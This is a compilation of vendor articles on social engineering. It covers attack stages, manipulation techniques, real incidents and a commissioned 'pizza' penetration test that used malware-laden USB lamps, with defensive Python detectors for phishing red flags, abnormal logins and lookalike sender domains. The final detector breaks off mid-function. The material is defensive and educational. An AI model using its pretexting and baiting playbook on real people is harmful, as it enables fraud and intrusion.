Social engineering uses deceit and manipulation on the one hand and trust and human weaknesses on the other. All these behaviors and psychological characteristics, along with our need for control, are the basics of human nature and possibly come from the deception techniques of other species. For example, some apes are capable of consciously lying.

Various ancient mythologies and religions told stories about social engineering as a warning against gullibility. The Trojan Horse and Eve eating the Apple are the best-known examples in the West. Interestingly, the Ancient Greeks praised lying and even created sophistry.

The more recent examples of social engineering include:

  • The sale of the Eiffel Tower for metal scraps in 1925.
  • The stealing of $10M from Security Pacific National Bank over the phone in the 1970s.
  • 419 scam: cybercriminals request a target to make a small payment in return for a future share in a larger amount of money. The scam first started via regular mail and then turned to more modern technologies like email.

How has technology changed social engineering attacks?

The development of technology has facilitated social engineering attacks in the following ways:

1. Attacks became safer for criminals because technology provides anonymity. When a criminal doesn't engage with their victim or target directly, there's no chance that their face will be remembered and recognized or recorded on a security camera. Also, there's no chance of leaving behind fingerprints, DNA, or other clues.

Payments using cryptocurrency also enable social engineers to remain in the shadows.

2. Technology enables criminals to target people all over the world. It enables them to act from countries with no or unclear legislation on cybercrime and remain unpunished. Government-funded advanced persistent threat actors are even protected by their respective countries.

3. Technologies like deepfakes enable criminals to impersonate various people successfully, e.g., in CEO fraud.

The Risks of Social Engineering Attacks

A single successful social engineering attack can have a severe impact on an organization. Here are some of the most widespread:

1. Financial loss

A cyber attack can cause substantial financial losses, including loss of revenue due to the halt of operations, additional costs for incident response, and ransom payments to cyber criminals. In the case of industrial espionage, the company can suffer from the actions its competitors take after obtaining sensitive information.

2. Reputational loss

A cyber security incident negatively impacts the reputation of a company leading to the loss of potential and existing clients.

3. Downtime

After a security breach, an organization’s operations are suspended for some time. For example, a ransomware attack makes it impossible for people to work with the company’s data as it has been encrypted.

4. Legal implications

The quantity of laws and regulations governing IT security and data protection has been steadily growing over the past three decades. The government can additionally punish the victim of a social engineering attack for not taking necessary actions for data protection.

Victims by proxy of an attack can also sue the victim of an attack.

5. Impact on employees’ wellbeing

Crime causes distress in employees and impacts their performance. Some people even leave the organization after it has fallen victim to crime.

6. Termination of business

The impact of social engineering attacks can deteriorate organizations to the point when they terminate their operations. For example, in 2022, Lincoln College shut down after 157 years of work.

7. Impact on the dependants of an organization

Clients and partners of victims of social engineering attacks often become victims by proxy. It is especially severe in the case of hospitals, critical infrastructure, or service providers. For example, a ransomware attack on CommonSpirit, the electronic record system, wreaked havoc in many hospitals across the US.

Learn how criminals plan and carry out social engineering attacks, what techniques they use, and what weaknesses they exploit.

Stages of social engineering attacks

Usually, a social engineering attack has five stages:

Cybercriminals must devise the attack, choose the type of social engineering, and find tools to carry it out.

Gather intel

At this stage, cyber criminals mostly use OSINT (open source intelligence) techniques to learn about their targets and victims.

The company’s official website, LinkedIn and other social networking platforms, and employee review websites like Glassdoor are valuable sources of such information.

You can easily learn the address of the company’s offices, the names of the employees, their roles and contact information, and even some internal problems like high employee turnover or bosses that are not used to hearing ‘no.’

This valuable data can be used against your business. This stage can be elaborate, as in CEO fraud or spear phishing, or minimal for less personalized attacks.

Establish contact with the target

At this stage, a criminal contacts one or multiple targets via the chosen medium (email, phone, or in person). The social engineer tries to establish trust and rapport using multiple techniques and to collect the necessary information.

Attack the system

Once the target has given away the information, social engineers begin the penetration of the protected system. It can be a ransomware attack, a login into an account with attempts to steal documents, or transferring money from the victim’s account.

End of the contact

Cybercriminals might choose to end the contact with their target in a way that a target doesn’t suspect foul play. In this case, such a person will not react immediately and take necessary actions (like changing the password, calling a bank, or reporting the attack to the police).

What weakness does social engineering exploit?

Social engineering attacks exploit multiple weaknesses in humans and systems.

The general human weaknesses

First, there are situational weaknesses like work stress or personal issues. Second, certain physiological and psychological traits make people more susceptible to social engineers:

  • selective visual attention with a focus, margin, and fringe
  • cognitive biases (e.g., normalcy bias)
  • fear of mistake
  • overconfidence and vanity
  • gullibility
  • lack of responsibility.

The business weaknesses

Some institutional problems make employees more susceptible to social engineering attacks. For example:

  • High levels of stress
  • Poor planning
  • Work overload
  • Toxic corporate culture

For example, a fake email with a credential request from a manager that is excessively judgemental can cause stress in a target. As a result, they might omit the red flags of a social engineering attack. Unfortunately, many businesses turn a blind eye to these issues.

Lack of security awareness training

Security awareness training can significantly increase the ability of employees to spot social engineering attacks. Companies should never underestimate its impact.

Learn more about Cybersecurity Awareness .

IT system weaknesses

Companies that rely solely on human vigilance are likely to fall victim to social engineering attacks. Human error is inevitable in the long run. That’s why your business needs data protection tools that can play the role of the last layer of defense.

Techniques used in social engineering attacks

To exploit the weaknesses of humans, social engineers put extra pressure on the targets by applying the following techniques:

  • Urgency (for example, in spear phishing or CEO fraud, the criminal might say that some information must be provided ASAP).
  • Scare tactics (for example, the target is forced to believe that their account has been hacked, and they need to do certain actions like clicking the button in the phishing email to reclaim it).
  • Authority and conformity (for example, cybercriminals might impersonate governments or law enforcement organizations to create trust and readiness to comply).
  • Social connections (it’s not necessary to be friends with a target, sometimes, a brief introduction or referring to a mutual ‘acquaintance’ is enough to establish trust).
  • FOMO or other types of scarcity.

More than one technique can be used. For example, spear phishing attacks often use authority and urgency.

Social engineering attack example

John is an accountant at ABC company, which produces packaging. One day he receives an email from his boss requesting an urgent transfer of a large payment. He has been very stressed at home because his daughter has been sick.

Additionally, John had a falling out with his boss. These stress factors make him inattentive, and he doesn't notice that the boss's name in the email address is misspelled.

There are many types of social engineering attacks. Some complex crime schemes involve using multiple types at the same time.

Phishing attacks are one of the most popular types of social engineering. They use electronic mail to establish contact with a target.

Phishing emails mimic regular messages from a credible sender. Social engineers impersonate banks, SaaS collab tools (like Microsoft 365 or Google Workspace), popular platforms (like Facebook), or even people. The messages have minimal personalization, like the name of a recipient. In some cases, they can even use the standard ‘Dear Sir/Madam.’

Usually, phishing emails ask the target to confirm sensitive information, for example, the CVV code of a bank card or login credentials.

Once the target has shared the sensitive information, criminals use it to obtain access to money or the IT system and proceed with the crime.

Spear phishing

Spear phishing attacks are similar, only the level of personalization is much higher. That’s why the OSINT stage of these attacks takes much more time.

Usually, spear phishing is carried out against high-profile companies or organizations. The emails might mimic coworkers, partners, or clients.

Whaling and CEO fraud

Whaling and CEO fraud are a subtype of spear phishing emails. Cybercriminals impersonate a C-level executive or the CEO of a company and demand that employees provide valuable information or complete transfers. This type of attack might even include deepfakes.

SMiShing and Vishing

SMiShing and vishing are similar to phishing attacks; only the message is sent via text (SMS) or voice (hence the V in the name).

This technique is used to get into an otherwise secured company office. The criminals follow authorized personnel into the office. Often, they start a conversation with a target during lunch or while smoking outside the building. They can pretend to have forgotten their card in the office or to be an intern.

Once in the office, a cybercriminal can leave a piece of hardware (usually a USB flash) with installed malware in a visible place. The expectation is that an employee takes the bait and connects it to their computer, infecting it.

Cybercriminals can even write something enticing on the hardware (e.g., next year’s promotion candidates) to make it harder to resist the temptation.

Quid pro quo

For many people, it is hard to say no to a person who is prosocial to them. For example, a cybercriminal helps an employee in a cafe and then asks to deliver something to the office for them.

A criminal can make a call or send an email with an offer to help (e.g., arrange an interview with a newspaper for PR purposes). Then they would ask questions that can seem legitimate and secure. Meanwhile, the criminal will use the answers for the attack.

This is a complex social engineering scheme in which the criminal investigates the victim and the target and then creates a pretext to get in contact with the target.

Scareware or Rogue

This attack uses fake malware warnings to make the target believe they have been infected and pay for tools that supposedly remove the infection.

Ransomware attack

A ransomware attack is a malware attack that often uses phishing emails to infect IT systems. It encrypts the files on a PC or in cloud office suites like Google Workspace or Microsoft 365. Unlike scareware, the infection is real, and decryption is only possible with a special key.

Learn more about Cloud Ransomware.

Diversion Theft

Tricking the delivery service into dropping the goods at the wrong address, where the criminals will be able to get them.

Social Media

It is spear phishing carried out exclusively via social networking websites. Often it uses a honeytrap technique when a target sees an avatar photo of a person who meets current beauty standards.

This section reviews several ways to protect your organization from social engineering attacks. Using just one of them often proves to be insufficient. That’s why we recommend using them as a system of tools.

Red flags of social engineering

Every person should know and remember the red flags of social engineering.

Red flags in personal communication:

  • the rapid decrease in the distance (a person you just met behaves as if you’re good acquaintances), attempts to penetrate your boundaries
  • increased charm
  • emotional manipulation (fear, urgency, guilt)
  • an internal feeling of confusion


Red flags of phishing emails:

  • the name of the sender in the email is miswritten, especially if it is a long name (e.g., [email protected] instead of Anastasia)
  • the domain is miswritten (e.g., [email protected])
  • the unusual top-level domain (e.g., [email protected] instead of .ai)
  • an unusual style of email if you know the sender (e.g., your colleague always uses cheers at the end of the letter)
  • unusual time of an email
  • emotional manipulation (fear, urgency, greed)
  • request to provide sensitive information
  • call to click on a link
  • unusual URL of the link (too long, misspelling at any level of a domain, e.g., gooogle.com)
  • grammatical mistakes*

* It was a significant sign in the past. However, with the popularisation of spellcheckers and the ability of criminals to learn from their mistakes, fewer phishing emails have this red flag.
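The red flags above can be turned into an automated screening check on incoming mail. The following is an added example, not code from the original article; the organisation domain, colleague addresses, trusted hosts, working hours and both sample messages are constructed, and the grammar heuristic is left out for the reason given in the footnote:

```python
import re
from datetime import datetime
from difflib import SequenceMatcher

# Constructed reference data for a hypothetical organisation: its real mail
# domain, the colleagues whose mail is expected, trusted external hosts and
# the hours at which colleagues normally write.
KNOWN_DOMAIN = "example-corp.ai"
KNOWN_SENDERS = {"anastasia@example-corp.ai", "john.doe@example-corp.ai"}
TRUSTED_HOSTS = {"example-corp.ai", "google.com", "microsoft.com"}
WORK_HOURS = range(7, 20)                      # 07:00 to 19:59 local time
URGENCY_WORDS = ("urgent", "immediately", "asap", "within 24 hours", "expires today")
SENSITIVE_WORDS = ("password", "cvv", "credentials", "login details")
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def _similar(a: str, b: str) -> float:
    """Similarity ratio in [0, 1]; 1.0 means identical strings."""
    return SequenceMatcher(None, a, b).ratio()


def check_sender(sender: str) -> list[str]:
    """Misspelled sender name, misspelled domain, or an unexpected TLD."""
    flags = []
    sender = sender.lower().strip()
    if sender in KNOWN_SENDERS:
        return flags
    local, _, domain = sender.partition("@")
    name, _, tld = domain.rpartition(".")
    known_name, _, known_tld = KNOWN_DOMAIN.rpartition(".")
    if domain != KNOWN_DOMAIN:
        if name == known_name:                      # same name, other TLD
            flags.append(f"unusual top-level domain .{tld} (expected .{known_tld})")
        elif _similar(domain, KNOWN_DOMAIN) > 0.8:  # e.g. examp1e-corp.ai
            flags.append(f"misspelled domain {domain} (resembles {KNOWN_DOMAIN})")
    # A local part that is close to, but not equal to, a known colleague's.
    for known in KNOWN_SENDERS:
        known_local = known.split("@")[0]
        if local != known_local and _similar(local, known_local) > 0.8:
            flags.append(f"sender name {local} resembles {known_local}")
            break
    return flags


def check_urls(body: str) -> list[str]:
    """Overly long links and hosts that merely resemble a trusted host."""
    flags = []
    for url in URL_RE.findall(body):
        host = url.split("://", 1)[1].split("/", 1)[0].lower()
        if len(url) > 80:
            flags.append(f"unusually long URL ({len(url)} chars)")
        if host in TRUSTED_HOSTS or any(host.endswith("." + t) for t in TRUSTED_HOSTS):
            continue                                # genuine host or subdomain
        for trusted in TRUSTED_HOSTS:
            if _similar(host, trusted) > 0.8:       # e.g. gooogle.com
                flags.append(f"lookalike host {host} (resembles {trusted})")
                break
    return flags


def check_body(body: str) -> list[str]:
    """Emotional pressure, requests for sensitive data, calls to click a link."""
    text = body.lower()
    flags = []
    if any(w in text for w in URGENCY_WORDS):
        flags.append("urgency or emotional pressure")
    if any(w in text for w in SENSITIVE_WORDS):
        flags.append("request for sensitive information")
    if "click" in text and URL_RE.search(body):
        flags.append("call to click a link")
    return flags


def check_time(sent_at: datetime) -> list[str]:
    """Mail sent at an hour when the sender does not normally write."""
    if sent_at.hour not in WORK_HOURS:
        return [f"unusual send time {sent_at:%H:%M}"]
    return []


def score_email(email: dict) -> list[str]:
    """Every red flag found. An empty list means no heuristic fired,
    not that the mail is safe."""
    return (check_sender(email["from"]) + check_time(email["sent_at"])
            + check_body(email["body"]) + check_urls(email["body"]))


# Constructed sample messages (hypothetical): one phish, one ordinary mail.
SAMPLE_PHISH = {
    "from": "anastasla@example-corp.io",
    "sent_at": datetime(2024, 3, 5, 3, 12),
    "body": ("URGENT: your mailbox password expires today. Click "
             "http://gooogle.com/reset to keep access."),
}
SAMPLE_LEGIT = {
    "from": "john.doe@example-corp.ai",
    "sent_at": datetime(2024, 3, 5, 10, 30),
    "body": "Hi, notes from today's meeting are attached. Cheers",
}

if __name__ == "__main__":
    for flag in score_email(SAMPLE_PHISH):
        print("red flag:", flag)
```

The sample phish trips seven flags (misspelled name, wrong TLD, 03:12 send time, urgency, a password request, a click-the-link call and a gooogle.com lookalike), while the ordinary mail trips none.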

Security awareness training

Security awareness training is essential for a company's cybersecurity. Remember the following principles, which will ensure its effectiveness:

  • it should be part of your onboarding process
  • it should be regular and permanent (e.g., every six months)
  • it should be available for different types of learning (audio, video, text)
  • it should encompass penetration tests (e.g., fake attacks).

Data Control tech stack

The data control tech stack helps your IT team monitor your IT environment for possible unauthorized data access and sharing of sensitive information. Solutions like SpinOne SSPM provide a single pane of glass for all these functions:

  • AI-based detection of abnormal logins

If your employee falls victim to social engineering and gives up their credentials, your IT team can spot this if they have a tool that detects abnormal logins.

For example, your company operates in the US, and the login has been made from Australia. Or your employees work within one or two time zones, and you spot a login at unusual hours (3 AM your time).

  • AI-based monitoring of abnormal data behavior

Another possible sign that your system has been hacked is abnormal data behavior, e.g., the download of a large volume of data at once.


  • Data sharing control

A subtle way to get access to the data without being spotted is quickly changing its sharing settings. For example, a cybercriminal finds sensitive information and shares it with a third party.


To fix it, you need a tool able to detect the unwanted sharing settings and enable you to change them to the preferable ones.

  • Detecting emails with PII

Often the targets of social engineering will send PII upon the request of cyber criminals.
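The abnormal-login, bulk-download and sharing checks described above can be expressed as rules over a SaaS audit log. What follows is an added example, not part of SpinOne or the original article; the allowed countries, working hours, download threshold, internal domain and the audit events themselves are all constructed:

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed policy for a hypothetical US company: where staff normally log
# in from, which hours are working hours in the company's local time zone,
# how much data one user may pull per hour, and which mail domains are internal.
ALLOWED_COUNTRIES = {"US"}
LOCAL_TZ = timezone(timedelta(hours=-5))       # US Eastern Standard Time
WORK_HOURS = range(6, 22)                      # 06:00 to 21:59 local time
MiB = 1024 * 1024
BULK_DOWNLOAD_BYTES = 500 * MiB                # more than this per hour is abnormal
INTERNAL_DOMAINS = {"example-corp.com"}


def _parse(ts: str) -> datetime:
    """Audit timestamps are ISO 8601 in UTC, e.g. 2024-03-05T08:12:00Z."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def detect_abnormal_logins(events: list[dict]) -> list[tuple[str, str]]:
    """Logins from outside the allowed countries or outside working hours."""
    alerts = []
    for ev in events:
        if ev["action"] != "login":
            continue
        local = _parse(ev["ts"]).astimezone(LOCAL_TZ)
        if ev["country"] not in ALLOWED_COUNTRIES:
            alerts.append((ev["user"], f"login from unexpected country {ev['country']}"))
        if local.hour not in WORK_HOURS:
            alerts.append((ev["user"], f"login at unusual hour {local:%H:%M} local"))
    return alerts


def detect_bulk_downloads(events: list[dict]) -> list[tuple[str, str]]:
    """A user pulling more than BULK_DOWNLOAD_BYTES within any one-hour window."""
    alerts = []
    per_user = defaultdict(list)
    for ev in events:
        if ev["action"] == "download":
            per_user[ev["user"]].append((_parse(ev["ts"]), ev["bytes"]))
    for user, items in per_user.items():
        items.sort()
        start, total = 0, 0
        for ts, size in items:                  # sliding one-hour window
            total += size
            while ts - items[start][0] > timedelta(hours=1):
                total -= items[start][1]
                start += 1
            if total > BULK_DOWNLOAD_BYTES:
                alerts.append((user, f"{total // MiB} MiB downloaded within one hour"))
                break
    return alerts


def detect_external_sharing(events: list[dict]) -> list[tuple[str, str]]:
    """Sharing settings changed so a file becomes visible outside the company."""
    alerts = []
    for ev in events:
        if ev["action"] != "share":
            continue
        target = ev["target"]
        if target == "anyone_with_link":
            alerts.append((ev["user"], f"{ev['file']} made public via link"))
        elif target.rsplit("@", 1)[-1] not in INTERNAL_DOMAINS:
            alerts.append((ev["user"], f"{ev['file']} shared with external {target}"))
    return alerts


def analyze(events: list[dict]) -> list[tuple[str, str]]:
    """Run all three detectors over one batch of audit events."""
    return (detect_abnormal_logins(events) + detect_bulk_downloads(events)
            + detect_external_sharing(events))


# Constructed audit log: john's phished account is used from Australia at
# 03:00 local, pulls 600 MiB in 20 minutes and shares a file with an outsider;
# mary's activity is ordinary.
SAMPLE_EVENTS = [
    {"ts": "2024-03-05T14:00:00Z", "user": "john", "action": "login", "country": "US"},
    {"ts": "2024-03-05T08:00:00Z", "user": "john", "action": "login", "country": "AU"},
    {"ts": "2024-03-05T08:05:00Z", "user": "john", "action": "download", "bytes": 300 * MiB},
    {"ts": "2024-03-05T08:20:00Z", "user": "john", "action": "download", "bytes": 300 * MiB},
    {"ts": "2024-03-05T08:25:00Z", "user": "john", "action": "share",
     "file": "payroll.xlsx", "target": "someone@outside.example"},
    {"ts": "2024-03-05T15:00:00Z", "user": "mary", "action": "download", "bytes": 50 * MiB},
    {"ts": "2024-03-05T15:30:00Z", "user": "mary", "action": "share",
     "file": "notes.docx", "target": "john@example-corp.com"},
]

if __name__ == "__main__":
    for user, reason in analyze(SAMPLE_EVENTS):
        print(f"ALERT {user}: {reason}")
```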


Ransomware Protection

Some ransomware protection tools have proven to be efficient in battling not only ransomware but also its most unwanted outcome – downtime. However, you need to be careful when choosing this type of solution.

Most ransomware protection tools would wait till the end of a ransomware attack and then restore data from the backup. When it comes to cloud ransomware and large corporations, the recovery from backup can take weeks and even months.

Cloud collab environments like Google Workspace and Microsoft 365 have API limitations that will make the recovery process exceptionally long.

That’s why you need tools that detect a ransomware attack early on, immediately terminate it, and start the recovery process.

Solutions like SpinOne can reduce downtime by up to 99%: from a month to several hours.

Protect your data from social engineering with SpinOne

SpinOne is a SaaS Security Posture Management Platform that can help organizations protect their data stored in cloud environments of Google Workspace and Microsoft 365.

SpinOne is an AI-based application able to detect ransomware and unauthorized access to your cloud data. It can become the last layer of defense for your company in case of a phishing attack.


Written by Nick Harrahill

Nick Harrahill is the Director of Support at Spin.AI, where he leads customer support, success, and engagement processes .

He is an experienced cybersecurity and business leader. Nick’s industry experience includes leading security teams at enterprise companies (PayPal, eBay) as well as building programs, processes, and operations at cyber security start-ups (Synack, Elevate Security, and Spin.AI).

Credentialed in both cyber security (CISSP) and privacy (CIPP/US), Nick has managed teams focused on vulnerability management, application security, third-party risk, insider threat, incident response, privacy, and various facets of security operations.

In his spare time, Nick enjoys trail running and competing in ultra-marathons, camping, hiking, and enjoying the outdoors.


The “Pizza” method – a social engineering Case Study

‘Eight pizza delivery boxes with 30% discount and a free gadget for the computer’. Hackers posing as pizza delivery carried on a successful social engineering attack on the Warsaw branch office of a well-known international corporation. In a few minutes, they hacked the IT system – effectively paralyzing the operations of the whole company.  

In Poland alone, every year about 20% of all Internet users face phishing attacks. The targets are, apart from banking and payment system users, customers of Internet shops. This shows that the main target of the hackers is our money (data from Kaspersky Lab). In any case, the hacker’s ‘business’ pays off, because according to Nest Bank, as many as 30% of all Poles do not know what phishing is, while 32% feel that they know, even though they are not sure.

At the same time, the number of whaling attacks is still growing. ‘Whaling’ is more precise and sophisticated phishing that targets governmental institutions and large businesses. As the authors of the Verizon DBIR 2019 report state, today, high-ranking managers and company managers (that is the persons who have executive privileges and access to many reserved, sometimes critical IT infrastructure areas) are 12 times more exposed to attacks utilizing social engineering than only a year ago.


The most expensive pizza in history

Hackers use different methods to carry out the theft of data that is important to them. This data includes, for example, access data to bank accounts, PINs or credit card CVC numbers, detailed personal data or, in the case of whaling, sensitive company data. E-mail is still the major, though not the only, vector of cyberattack, and one of the most popular forms is the attack using social engineering, that is, an attack based on the human predisposition to unconsciously submit to outside influence. The directors and employees of a well-known international corporation found this out when its Warsaw branch was attacked by hackers using the “pizza” method. Even though the company had a hardware and software security system of top world level, the cybercriminals managed to find a hole in it. How did the attack come about?

Information was sent to the e-mail addresses given on our internet site about the opening of a new pizza parlour in the vicinity and that there would be a 30% discount for the first few customers. Employees tempted by this offer quickly organized a “Pizza Day” and ordered eight boxes. The menu was on the www page of the pizza parlour, which later proved to be fake and had been created just to authenticate the existence of the new spot – ‘Adam’, the CEO of the attacked company ruefully admits (due to security reasons the name of the company is not disclosed).

What happened next?

After a few dozen minutes, a pizza deliveryman appeared with the pizza and a free gift in the form of USB-powered LED lamps that changed colours to the rhythm of the music. Pleasantly surprised by the gift, the employees immediately plugged them into their computers. They were unaware that in this way they gave the hackers remote access to the company’s computer infrastructure; the hackers destabilised the operation of the whole system, and consequently of the entire company, in just a few minutes.

How is it possible that a company featuring security at the top level could fall victim to the efforts of cybercriminals? The weakest, least predictable and at the same time most susceptible link failed, i.e. human beings – in this case, people unaware of the risk and incorrectly trained in cybersecurity – the employees of the company.

TestArmy CyberForces was behind the attack

Luckily for the employees, the “pizza” method attack proved to be a security audit planned in advance, meant to reveal where the company was still at risk. As Szymon Chruścicki from TestArmy CyberForces, who on the order of the corporation had prepared the scenario of the attack and performed the social engineering test, states:

The attack scenario was based on a few simple steps. We started by creating a fake www site and then we ordered stickers with the name and logo of the pizza parlour. We used service e-mail addresses indicated on the web site of the attacked corporation. After receiving an order from the employees, our employee delivered pizzas bought from a local pizzeria, having stuck the logo of our fake one on the boxes. We used the rule of reciprocity and sympathy to get the employees to undertake the planned action, in this case connecting to their computers lamps in which we had mounted prepared flash memory sticks containing malware. Outside the building, our cybersecurity specialist waited, and as soon as he gained remote access to the hardware, he was able to encrypt all the data in the company system.

What was all this activity for? Let’s remember that the security system is as efficient as its weakest link, and for this reason alone, social engineering attacks are one of the most effective methods used by hackers. Simulations with the use of malware are necessary in order to fully understand the character of these hazards. On the one hand, they allow the discovery of holes in the security systems, and on the other hand, they train employees how not to become victims of the social engineering tricks used by cyber-crime hackers.

Famed examples from a few last months

There are multiple examples of effectively performed attacks using social engineering. To name just a few:

  • A few million Polish zlotych were lost by the Cenzin company, which belongs to the Polish Armaments Group, after cyber-crime hackers posed as a weapons supplier from the Czech Republic. The employees did not verify the information sent by e-mail concerning a change of the account number to which Cenzin paid money for the purchased goods. Because of this, the financial transaction ended up in the hackers’ account.
  • Personal details of 20 thousand FBI employees and 9 thousand employees of the United States Department of Homeland Security were leaked after a hacker posing as a new employee called the Justice Department asking to be given the access code to the restricted web pages of the institution. As a result, he received access to an internal network that included the mail addresses of government personnel and information concerning their credit card numbers.
  • One of the American banks suffered great corporate image loss after hackers broke into its mailing system. On being refused payment of a ransom, they commenced sending millions of spam mail. Due to this, the web service provider was forced to switch off the electronic mail service of the bank.
  • Hackers earned over 500 thousand dollars in 2018 using so-called “sextortion scams”, i.e. sending blackmail messages (usually from the address belonging to the victims) with a threat to make public, compromising films or photos of the victim that were allegedly in their possession, if the hacker did not receive the requested amount of money (the data by GlobalSign).

How to protect oneself against hackers? TOP 4 hints

  • Report and then remove all messages asking for personal details, logins and passwords. Mail like this is likely fraudulent.
  • Verify the e-mail senders before you send them the requested files or before you perform the requested activity. Do this not once or twice, but three times.
  • Set your e-mail spam filters to high.
  • Update your anti-virus software regularly and visit only safe web sites.

As Szymon Chruścicki, the cybersecurity expert of the TestArmy CyberForces sums up:

Let’s be watchful and cautious. Let’s invest in employee training and warn them continuously against opening unverified emails and attachments from unknown senders. If anything raises doubts, let’s report it to the company IT department. These are very simple actions that can protect the easiest thing that can be manipulated by hackers – human vigilance.

The only plus that can be pointed out is that we in Poland are not the main target of cyber-crime hackers. According to Kaspersky Lab data, the largest percentage of phishing attack victims live in Brazil, Australia, Spain and Portugal. Poland, at 10.2%, sits more or less in the middle of the list.

If you’re looking for protection from social engineering attacks, check our social engineering service. Contact us and we’ll perform a comprehensive test and run workshops with your employees.


5 Examples Of Social Engineering Attacks: Learn How Social Engineers Trick Their Way In

Luke Noonan

  • Phishing and Ransomware

Explore in the article five famous examples of social engineering attacks and discover how these tactics deceive individuals. Humans are inherently social beings, enjoying mingling, communication, work, and shared activities. This sociability, rooted in trust, facilitates cooperation and coexistence within human groups.

However, these very social traits are also exploited by cybercriminals aiming to cause harm. Social engineering attacks capitalize on these vulnerabilities, employing deception and impersonation to manipulate individuals into actions that serve the scammer’s agenda.

This is borne out by the 2023 Verizon Data Breach Investigations Report (DBIR) , which found that 82% of breaches involve a human element.

Here is a look at how social engineering attacks happen and what you can do to prevent your staff from being socially engineered.

How Do Social Engineering Attacks Happen?

According to a recent report, the average organisation experiences 700 social engineering attacks per year. Social engineering attacks come in many forms and evolve into new ones to evade detection.

The aim of a social engineering attack is to get someone to do something that benefits a cybercriminal, for example tricking a person into revealing financial details that are then used to carry out fraud.

Social engineering is not just carried out using digital methods. Social engineers will turn to any tactic to build the structures needed to trick people. This can include using the telephone or walking into an office and chatting with the staff.

Current favourite social engineering tricks include:

Pretexting and tailgating: attackers will pretend to be a co-worker or person in authority, e.g., a police officer. They will use this guise to establish trust with a target via a digital method, phone, or in person. Once trust is established, the scammer will attempt to extract information, such as personal data or financial details.

In addition, tailgators often carry out physical attacks on companies, finding ways to enter a building, slipping in unnoticed or even invited. Once inside a building, they can use readily available tools, such as RubberDucky USB used by legitimate penetration testers, to steal data, including login credentials.

Phishing: phishing comes in various flavours, including email, phone calls, social media posts, and text messages. Phishing attack messages encapsulate social engineering tactics, using pretense, trust, and the urge to click to encourage recipients to divulge personal information, such as passwords and credit card details.

A UK Gov study into cyber security found that the vast majority (83%) of businesses who identified a cyber attack said that phishing was the primary vector of the attack.

Spearphishing is the targeted form of phishing that takes social engineering to the greatest heights of success. Spearphishing emails are hard to differentiate from legitimate emails because scammers go to great lengths to make them look realistic, often forming trusted relationships with their target. Spearphishing is behind 93% of cyber attacks, according to the 2018 DBIR.

Baiting: this social engineering attack uses enticement or fear of missing out (FOMO) to encourage certain behaviours. For example, an employee may be offered free gifts if they provide personal or company information or passwords.

Why Are Social Engineering Attacks Effective?

Human beings have evolved to act and behave in certain ways to establish strong and cohesive social structures. Elements such as trust are vital components of coherent societies. Without trust, relationships fail.

Scammers understand human behaviour and the need to build trusted relationships. They also understand how to manipulate people by pretending to be a trusted person or building trust.

Other human behaviours such as the urge to do a good job, not get into trouble, or not miss out on a good thing are also abused by cybercriminals. All these natural actions we carry out daily in our home and work lives are open to exploitation by cybercriminals intent on stealing data and accessing networks to carry out malicious acts.

5 Examples of Social Engineering Attacks

Examples of social engineering are regularly in the press, but here are five to give you a flavour of how social engineering works:

Marriott Hotel: a hacking group used social engineering tactics to steal 20 GB of personal and financial data from a Marriott Hotel. The hackers tricked a Marriott Hotel associate into giving the hacking gang access to the associate’s computer.

US Department of Labor (DoL): this involved a socially engineered attack stealing Office 365 login credentials. The attack used sophisticated phishing based on cleverly spoofed domains that looked just like the legitimate DoL domain. The emails seemed to be from a senior DoL employee inviting them to submit a bid for a government project. Clicking the bid button took the employee to a phishing site used to steal credentials.

Zoom users : a phishing campaign targeting employees affected at least 50,000 users. The social engineers used fear of redundancy to encourage employees to click a link to meet with HR over Zoom. Clicking on the link took the employee to a fake Zoom login site designed to steal passwords.

FACC (Austrian aircraft manufacturer): FACC lost around 42 million euros when the company became the victim of a sophisticated Business Email Compromise (BEC) scam. The CEO of the company had his email account spoofed and then used to send an ‘urgent’ email request for a funds transfer. This email tricked an accounts payable employee, who accommodated the request, paying the money into the scammer’s account.

Crowdstrike callback: even security vendors are feeling the force of social engineering. Crowdstrike has become an unwitting pawn in the social engineer’s game. Scammers are using the trusted brand of Crowdstrike and other security vendors to send phishing emails to employees. The email contains details of a possible malware infection and a phone number to call to remove the installed malware. If the employee calls the number, they are tricked into giving the attacker access to their computer.
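The DoL and FACC cases above turn on a sender that merely resembles a trusted one: a lookalike domain, or an executive’s name on the wrong address. As an added example (not code from MetaCompliance or any vendor quoted on this page), the Python check below flags three such patterns in a From: header; TRUSTED_DOMAIN, EXECUTIVES, the homoglyph list and the sample headers are all constructed placeholders.

```python
import re
from email.utils import parseaddr

# Constructed placeholders for this example: substitute your own domain and
# the real addresses of the people most often impersonated in BEC mail.
TRUSTED_DOMAIN = "example.com"
EXECUTIVES = {"jane doe": "ceo@example.com"}  # lowercased display name -> real address

# Character swaps commonly used to build lookalike domains (constructed, not exhaustive).
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize_domain(domain):
    """Undo common homoglyph substitutions so 'examp1e.com' reads 'example.com'."""
    d = domain.lower()
    for fake, real in HOMOGLYPHS:
        d = d.replace(fake, real)
    return d


def levenshtein(a, b):
    """Edit distance; being one character off the trusted domain is a typosquat signal."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete a character of a
                           cur[j - 1] + 1,              # insert a character into a
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def classify_sender(from_header):
    """Return a list of impersonation findings for one From: header (empty = clean)."""
    name, addr = parseaddr(from_header)
    if "@" not in addr:
        return ["unparseable_sender"]
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[1]
    name_key = re.sub(r"\s+", " ", name).strip().lower()
    findings = []

    # Genuine mail comes from the trusted domain itself or one of its subdomains.
    trusted = domain == TRUSTED_DOMAIN or domain.endswith("." + TRUSTED_DOMAIN)
    if not trusted:
        norm = normalize_domain(domain)
        if (norm == TRUSTED_DOMAIN or norm.endswith("." + TRUSTED_DOMAIN)
                or levenshtein(domain, TRUSTED_DOMAIN) <= 1):
            findings.append("lookalike_domain")
        elif TRUSTED_DOMAIN in domain:
            # e.g. example.com.bid-portal.test: the trusted name is only a label
            # inside a domain the attacker controls
            findings.append("trusted_domain_embedded")

    # The executive's name paired with any address but the real one is the
    # pattern behind CEO-fraud mail.
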